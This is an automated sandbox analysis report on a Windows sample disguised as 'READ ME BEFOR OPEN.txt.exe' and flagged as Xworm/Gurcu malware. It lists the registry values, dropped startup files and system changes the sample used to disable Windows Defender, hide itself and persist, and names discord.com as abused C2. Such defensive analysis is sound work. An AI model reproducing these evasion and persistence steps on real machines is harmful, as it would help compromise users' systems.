Malware Analysis Report

2025-04-13 12:20

Sample ID 250320-xe2awswzdt
Target READ ME BEFOR OPEN.txt.exe
SHA256 159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c
Tags
gurcu xworm defense_evasion discovery evasion execution exploit persistence privilege_escalation ransomware rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c

Threat Level: Known bad

The file READ ME BEFOR OPEN.txt.exe was found to be: Known bad.

Malicious Activity Summary

gurcu xworm defense_evasion discovery evasion execution exploit persistence privilege_escalation ransomware rat stealer trojan

Contains code to disable Windows Defender

Modifies security service

Modifies Windows Defender DisableAntiSpyware settings

Disables service(s)

Gurcu, WhiteSnake

Xworm

Gurcu family

Xworm family

Detect Xworm Payload

Modifies boot configuration data using bcdedit

Manipulates Digital Signatures

Modifies Windows Firewall

Possible privilege escalation attempt

Disables RegEdit via registry modification

Sets file to hidden

Stops running service(s)

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Disables Task Manager via registry modification

Modifies file permissions

Executes dropped EXE

Drops startup file

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Power Settings

Legitimate hosting services abused for malware hosting/C2

Network Share Discovery

Adds Run key to start application

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Unsigned PE

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Runs net.exe

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Delays execution with timeout.exe

Views/modifies file attributes

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-20 18:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-20 18:46

Reported

2025-03-20 19:05

Platform

win11-20250314-de

Max time kernel

900s

Max time network

491s

Command Line

"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables service(s)

defense_evasion execution

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\system32\reg.exe N/A

Xworm

trojan rat xworm

Xworm family

xworm

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

defense_evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\cmd.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\attrib.exe N/A
N/A N/A C:\Windows\System32\attrib.exe N/A

Stops running service(s)

defense_evasion execution

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat C:\Windows\system32\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat C:\Windows\system32\cmd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\perfc00A.dat N/A N/A
File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File created C:\Windows\system32\perfc007.dat N/A N/A
File created C:\Windows\system32\perfh009.dat N/A N/A
File created C:\Windows\system32\perfh00A.dat N/A N/A
File created C:\Windows\system32\perfc010.dat N/A N/A
File opened for modification C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h N/A N/A
File created C:\Windows\system32\perfh010.dat N/A N/A
File created C:\Windows\system32\perfh011.dat N/A N/A
File opened for modification C:\Windows\system32\PerfStringBackup.INI N/A N/A
File created C:\Windows\system32\perfc00C.dat N/A N/A
File created C:\Windows\system32\perfh00C.dat N/A N/A
File created C:\Windows\system32\perfc011.dat N/A N/A
File created C:\Windows\system32\PerfStringBackup.TMP N/A N/A
File created C:\Windows\system32\perfc009.dat N/A N/A
File created C:\Windows\System32\Rasauq\$77RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\System32\$666-RasauqBroker.bat C:\Windows\system32\cmd.exe N/A
File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini N/A N/A
File created C:\Windows\system32\perfh007.dat N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\netrtl64.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\compositebus.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\audioendpoint.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\printqueue.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\disk.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\swenum.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\rdpbus.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\INF\monitor.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\umbus.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\usbport.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\vhdmp.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\SystemTemp N/A N/A
File opened for modification C:\Windows\INF\c_swdevice.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\hdaudio.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\keyboard.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\INF\cdrom.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\vdrvroot.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\input.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\volume.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\kdnic.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\acpi.PNF C:\Windows\system32\powercfg.exe N/A
File created C:\Windows\inf\WmiApRpl\WmiApRpl.h N/A N/A
File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.ini N/A N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\INF\volmgr.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\pci.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\mshdc.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\msmouse.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h N/A N/A
File opened for modification C:\Windows\INF\hdaudbus.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\INF\spaceport.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\cpu.PNF C:\Windows\system32\powercfg.exe N/A
File opened for modification C:\Windows\INF\mssmbios.PNF C:\Windows\system32\powercfg.exe N/A
File created C:\Windows\inf\WmiApRpl\WmiApRpl.ini N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
